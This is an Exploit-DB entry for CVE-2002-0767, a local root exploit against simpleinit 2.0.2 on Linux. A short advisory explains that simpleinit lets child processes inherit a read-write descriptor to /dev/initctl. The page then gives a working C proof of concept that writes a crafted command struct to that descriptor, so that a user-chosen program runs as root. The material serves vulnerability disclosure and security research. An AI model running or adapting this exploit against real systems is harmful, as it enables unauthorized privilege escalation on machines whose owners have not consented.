Richard Gooch SimpleInit 2.0.2 - Open File Descriptor

EDB-ID:

21538

CVE:

2002-0767

EDB Verified:

Author:

Patrick Smith

Type:

local

Exploit:   /  

Platform:

Linux

Date:

2002-06-12

Vulnerable App: 
// source: https://www.securityfocus.com/bid/5001/info

A vulnerability has been reported for simpleinit that may allow users to execute arbitrary commands as the superuser.

The vulnerability occurs because simpleinit may allow some child processes to inherit a file descriptor with read-write access. The file descriptor is used to access /dev/initctl and this descriptor is normally used by 'initctl', 'need' and 'provide' programs to pass instructions to simpleinit. The simpleinit process runs with root privileges.

A local user whose process inherits this file descriptor will be able to cause simpleinit to execute commands as the superuser.

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include "simpleinit.h"  /* From the util-linux source */

int main()
{
   int fd = 3;
   char buf[COMMAND_SIZE];
   struct command_struct* cmd = (struct command_struct*) buf;

   memset(buf, '\0', sizeof(buf));
   cmd->command = COMMAND_NEED;
   cmd->pid = 17;
   cmd->ppid = 16;
   strcpy(cmd->name, "/home/pat/x/foo");  /* foo will be run as root */
   write(fd, buf, COMMAND_SIZE);
   return 0;
}
Copy
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services